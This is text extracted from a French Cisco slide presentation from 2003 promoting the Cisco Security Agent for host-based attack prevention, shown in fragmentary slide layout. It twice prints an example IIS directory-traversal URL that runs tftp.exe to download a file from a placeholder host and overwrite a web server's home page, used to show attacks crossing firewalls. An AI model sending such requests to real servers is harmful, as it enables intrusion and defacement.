Académique Documents
Professionnel Documents
Culture Documents
FR
X.25
LS
ATM
Mobilité :
• Nouvelles méthodes
d’accès au réseau :
Accès VPN
Accès Wireless
• Besoins d’ouverture
des datacenters
• Généralisation de la
messagerie
électronique
• Généralisation des
technologies Web
• Généralisation d’OS
et d’applications
cibles privilégiées
d’attaques
© 2003 Cisco Systems, Inc. All rights reserved. 3
Nouvelles contraintes…
Problème
Vers Virus
- Dégats plus graves
- Propagation plus rapide
- Patches plus fréquents
Avant Maintenant
Proactive et
Reactive
automatisée
Produits Isolés Intégrée à
l’infrastructure
Produits spécialisés Intégrée aux
Systèmes d’extrémités
ALARM
Durcissement
2001 De l’IOS Today
Cisco
Trust VLAN de Quarantaine
Agent
Password
Guessing
PC PC
« Innocents » Corrompus
© 2003 Cisco Systems, Inc. All rights reserved. 14
Les attaques traversent les firewalls !
Firewall Serverfarms
http://XYZ/scripts/..%%35c..%%35c../winnt/system32/tftp.exe?X.Y.Z+get+default.htm+c:\inetpub\wwwroot\default.htm
T0 T1 T2 T3
Go ! Bingo !
Phase 1 : Localiser Phase 2 : Infecter Phase 3 : Paralyser
- Les accès persister
- Les systèmes multiplier
• Objectif de l’attaque :
Paralyser le système d’information
Frapper plus vite que la défense, plus vite que l’antivirus
T1 T5
Prévention contre les attaques connues Réponse antivirus Restauration après infection
$ $$ $ $$ $$ $$$$ $$$$
Secondes
Minutes
Agir plus vite !
Jours
Semaines
T1 T5
Agir à T0 : aucune infection possible !
Prévention contre les attaques connues Réponse antivirus Restauration après infection
$ $$ $ $$ $$ $$$$ $$$$
Firewall Serverfarms
Protection de l’OS
- Buffer Overflow
- Appels systèmes malveillants
Protection des fichiers systèmes
Protection des fichiers utilisateurs
http://XYZ/scripts/..%%35c..%%35c../winnt/system32/tftp.exe?X.Y.Z+get+default.htm+c:\inetpub\wwwroot\default.htm
Alerte de l’administrateur
...
Web Email Web
Server Client Browser Contrôle des accès :
- Au Système de fichiers
System Call Interceptor CSA - A la base de registre
- Aux Objets COM
Host Operating System - Aux services HTTP
- A la mémoire
- De l’execution de code
Contrôle des accès aux fichiers Protection anti buffer overflows (saturation
de mémoire de travail de la CPU)
Contrôle des accès au réseau
Protection contre la capture de le frappe
Contrôle des accès a la base de registre clavier
Contrôle des accès aux composants com • Surveillance de l’activité réseau
• Contrôle des .exe Lancement de sniffer pirate ou de
protocole non autorisé sur la machine
Protection contre les vers (email)
Scan réseau
Protection contre l’exécution de fichiers
téléchargés (.exe, ActiveX) Capture de log systèmes
Firewall Host-based
Distribué IDS
CSA Conventionnel Conventionnel
Blocage d’attaques “Zero-day” X
Blocage des requêtes réseaux entrantes X X
Blocage des requêtes réseaux sortantes X X
Analyse de paquets - inspection d’état X X
Détection et blocage du scan de ports X X
Détection et blocage du DoS X X
Détection et blocage d’applications malicieuses X X
Blocage d’attaques Buffer Overflows connues X Détection
Blocage d’attaques Buffer Overflows non connues X
Prévention des modifications de fichiers systèmes X Détection
Vérouillage de l’Operating System X X
CSA Anti-Virus
SNMP
Traps Agents Serveurs
Custom
Programs
Local
File
© 2003 Cisco Systems, Inc. All rights reserved. 29
CSA Starter Bundle
• Agent Windows
Windows 2000 Server and Advanced Server
Windows NT 4.0 Server and Enterprise Server (Service
Pack 5 or later)
• Agent Solaris
Solaris 8 Service Pack ARC architecture (64-bit kernel)
• Windows uniquement
Windows NT 4 Workstation (Service Pack 5 or later)
Windows 2000 Professional
Windows XP Professional